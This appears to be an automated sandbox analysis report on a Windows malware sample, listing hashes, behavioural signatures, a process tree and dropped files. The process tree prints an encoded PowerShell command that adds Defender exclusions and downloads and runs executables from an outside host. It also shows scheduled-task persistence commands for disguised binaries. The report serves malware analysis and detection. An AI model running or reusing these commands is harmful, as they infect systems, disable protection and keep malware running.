Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
23-05-2024 03:07
General
-
Target
bot_start.exe
-
Size
2.5MB
-
MD5
62dec8c537e3aa76b294ab744b20d245
-
SHA1
1f4ec4852cd84d32a0d26ba0e163a373811eaebd
-
SHA256
cc97b59379bc6eafe5c5c9dc66f16d4795270e01dce613652359bc852ba0665a
-
SHA512
f47bbf3260f0124ec947b3a37ce316700481a8c4d5d984c9012df85673eb0d2c8777396e5a957cfc900ed509045e50d196558e931a84df146115e950abd8f6a7
-
SSDEEP
49152:SNkG6I1nPFf56dv26ot3VwBtF+kze3xqH1Hm4I6qxOli96Jyn5tzEde3Yx:S/fP9se6ot3VwBtF+kzeQHMdLcK6EtzY
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 3 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bot_start.exe"C:\Users\Admin\AppData\Local\Temp\bot_start.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbgB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcABlAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBrAGkAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGsAbgB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgBzAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcAB6AGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAcwB5AHUAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHkAcgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAByAHQAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAGUAagBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGUAZQBrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAegB6AGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGYAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHAAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBuAGEAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBjAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAGUAZQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAYwByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAoACQAcAB3AGQAKQAuAHAAYQB0AGgAIAA8ACMAaQBpAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBhAGkAbgAuAHAAeQAnACkAPAAjAHUAdwB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAbQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHgAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQA8ACMAbABqAHEAIwA+AA=="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\fontdrvhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PolicyDefinitions\it-IT\TextInputHost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\it-IT\Registry.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\csrss.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\de-DE\sysmon.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JOpEnIGaVu.bat"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
-
C:\Windows\de-DE\csrss.exe"C:\Windows\de-DE\csrss.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\it-IT\TextInputHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\it-IT\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\it-IT\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\it-IT\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\de-DE\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\de-DE\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\de-DE\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\de-DE\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\de-DE\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Photo Viewer\de-DE\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\service.exeC:\Users\Admin\AppData\Roaming\service.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f3⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD52a194c39c4d8feff3f656557c026573f
SHA1a835267464a6bf63b97a07161614b77f8cc0a569
SHA256ff24d911f62a4ca34d98a0504c729e39dc4eb8263e60684c8d992576eba994cd
SHA512584cf04da4db711e2f29c1ad06249210855cc9030dc07f1a96a42623e54833ccd5c34140adffdfdf2909046dca493432162c880da48ae7c6e2b0dbc2296bd77e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
C:\Users\Admin\AppData\Local\Temp\JOpEnIGaVu.batFilesize
154B
MD505875a33afd6d4260ad9fc0dbf784326
SHA1c60e8a5e188db87b234c5659f9ebdffa1d892ff3
SHA256f0612550d72b764dd62d7f7116f1cceade0626f44d54a12bc222320fce154bc0
SHA51267bf188fce46776429670f87931552587a6e413b4cff24d908aa46790b3202c54a7ed0df8a0a0b27a055a4aaaf8621d64983f671edafab282e587cb9008c5bb0
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2ynt345.yzh.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\VC_redistx64.exeFilesize
2.4MB
MD5503e036a0d5f079e8fcdff5e82de8b59
SHA105bb2612246d6f71b68980e8a5eef12d17791229
SHA2569741a43016568fa3fd861cc38c18140f5ba1375ede80d9e41c10d473853aa1c9
SHA512769483bb10856130586f79fbfa25d94dc1db997f1c1a336e8535d2b28d733cd73abb9b2ae48040fc81d8f7ff6d11f0eeba97aa44e0fb05ff9aefbc6b74155b68
-
C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exeFilesize
1.5MB
MD57a4073a468cf2d6ae2836893f467c81d
SHA1ff54a200d4f6a1a696182f2cfde6e735b2580f37
SHA256af6a3a206daa66c291daac3dc17f29dd7d0e1504a92b6346b5c5fa252dcc3ef5
SHA5128df794241d4162850b5243b0844b3818a6ff010f2dda65bdae3a88a69e6f368c700c81997d781568652cb3b42ec98bd5d25ba86fec7d3b7a5856d459dba3bdd5
-
memory/216-1-0x000000007FA70000-0x000000007FE41000-memory.dmpFilesize
3.8MB
-
memory/216-2-0x0000000000400000-0x0000000000DF6000-memory.dmpFilesize
10.0MB
-
memory/216-3-0x000000007FA70000-0x000000007FE41000-memory.dmpFilesize
3.8MB
-
memory/216-0-0x0000000000400000-0x0000000000DF6000-memory.dmpFilesize
10.0MB
-
memory/888-221-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-235-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-247-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-223-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-226-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-229-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-232-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-219-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-238-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-191-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-241-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-187-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/888-244-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/2800-183-0x000000001D200000-0x000000001D208000-memory.dmpFilesize
32KB
-
memory/2976-21-0x0000000006600000-0x000000000661E000-memory.dmpFilesize
120KB
-
memory/2976-37-0x0000000007810000-0x00000000078B3000-memory.dmpFilesize
652KB
-
memory/2976-44-0x0000000007B30000-0x0000000007B41000-memory.dmpFilesize
68KB
-
memory/2976-45-0x0000000007B70000-0x0000000007B7E000-memory.dmpFilesize
56KB
-
memory/2976-46-0x0000000007B80000-0x0000000007B94000-memory.dmpFilesize
80KB
-
memory/2976-47-0x0000000007BC0000-0x0000000007BDA000-memory.dmpFilesize
104KB
-
memory/2976-48-0x0000000007BB0000-0x0000000007BB8000-memory.dmpFilesize
32KB
-
memory/2976-49-0x0000000007CA0000-0x0000000007CC2000-memory.dmpFilesize
136KB
-
memory/2976-50-0x0000000008BC0000-0x0000000009164000-memory.dmpFilesize
5.6MB
-
memory/2976-42-0x00000000079C0000-0x00000000079CA000-memory.dmpFilesize
40KB
-
memory/2976-39-0x0000000007F90000-0x000000000860A000-memory.dmpFilesize
6.5MB
-
memory/2976-40-0x0000000007940000-0x000000000795A000-memory.dmpFilesize
104KB
-
memory/2976-41-0x00000000746E0000-0x0000000074E90000-memory.dmpFilesize
7.7MB
-
memory/2976-38-0x00000000746E0000-0x0000000074E90000-memory.dmpFilesize
7.7MB
-
memory/2976-77-0x00000000746E0000-0x0000000074E90000-memory.dmpFilesize
7.7MB
-
memory/2976-43-0x0000000007C00000-0x0000000007C96000-memory.dmpFilesize
600KB
-
memory/2976-24-0x00000000077D0000-0x0000000007802000-memory.dmpFilesize
200KB
-
memory/2976-36-0x0000000006BE0000-0x0000000006BFE000-memory.dmpFilesize
120KB
-
memory/2976-26-0x00000000746E0000-0x0000000074E90000-memory.dmpFilesize
7.7MB
-
memory/2976-25-0x0000000070500000-0x000000007054C000-memory.dmpFilesize
304KB
-
memory/2976-23-0x00000000746E0000-0x0000000074E90000-memory.dmpFilesize
7.7MB
-
memory/2976-22-0x0000000006640000-0x000000000668C000-memory.dmpFilesize
304KB
-
memory/2976-20-0x0000000006040000-0x0000000006394000-memory.dmpFilesize
3.3MB
-
memory/2976-10-0x0000000005FD0000-0x0000000006036000-memory.dmpFilesize
408KB
-
memory/2976-9-0x0000000005F60000-0x0000000005FC6000-memory.dmpFilesize
408KB
-
memory/2976-8-0x0000000005730000-0x0000000005752000-memory.dmpFilesize
136KB
-
memory/2976-7-0x00000000746E0000-0x0000000074E90000-memory.dmpFilesize
7.7MB
-
memory/2976-6-0x00000000057C0000-0x0000000005DE8000-memory.dmpFilesize
6.2MB
-
memory/2976-5-0x0000000003030000-0x0000000003066000-memory.dmpFilesize
216KB
-
memory/2976-4-0x00000000746EE000-0x00000000746EF000-memory.dmpFilesize
4KB
-
memory/4428-85-0x0000000002FC0000-0x0000000002FD8000-memory.dmpFilesize
96KB
-
memory/4428-89-0x0000000002F80000-0x0000000002F8E000-memory.dmpFilesize
56KB
-
memory/4428-65-0x0000000000C40000-0x0000000000DC4000-memory.dmpFilesize
1.5MB
-
memory/4428-66-0x0000000002F20000-0x0000000002F26000-memory.dmpFilesize
24KB
-
memory/4428-83-0x000000001BC20000-0x000000001BC70000-memory.dmpFilesize
320KB
-
memory/4428-82-0x0000000002FA0000-0x0000000002FBC000-memory.dmpFilesize
112KB
-
memory/4428-79-0x0000000002F50000-0x0000000002F5E000-memory.dmpFilesize
56KB
-
memory/4428-95-0x000000001BC10000-0x000000001BC1C000-memory.dmpFilesize
48KB
-
memory/4428-87-0x0000000002F60000-0x0000000002F6E000-memory.dmpFilesize
56KB
-
memory/4428-93-0x0000000002FE0000-0x0000000002FEE000-memory.dmpFilesize
56KB
-
memory/4428-91-0x0000000002F90000-0x0000000002F9C000-memory.dmpFilesize
48KB
-
memory/4500-227-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-170-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-182-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-220-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-230-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-248-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-233-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-190-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-236-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-188-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-239-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-76-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-242-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-224-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-245-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4500-184-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4724-109-0x0000014D527E0000-0x0000014D52802000-memory.dmpFilesize
136KB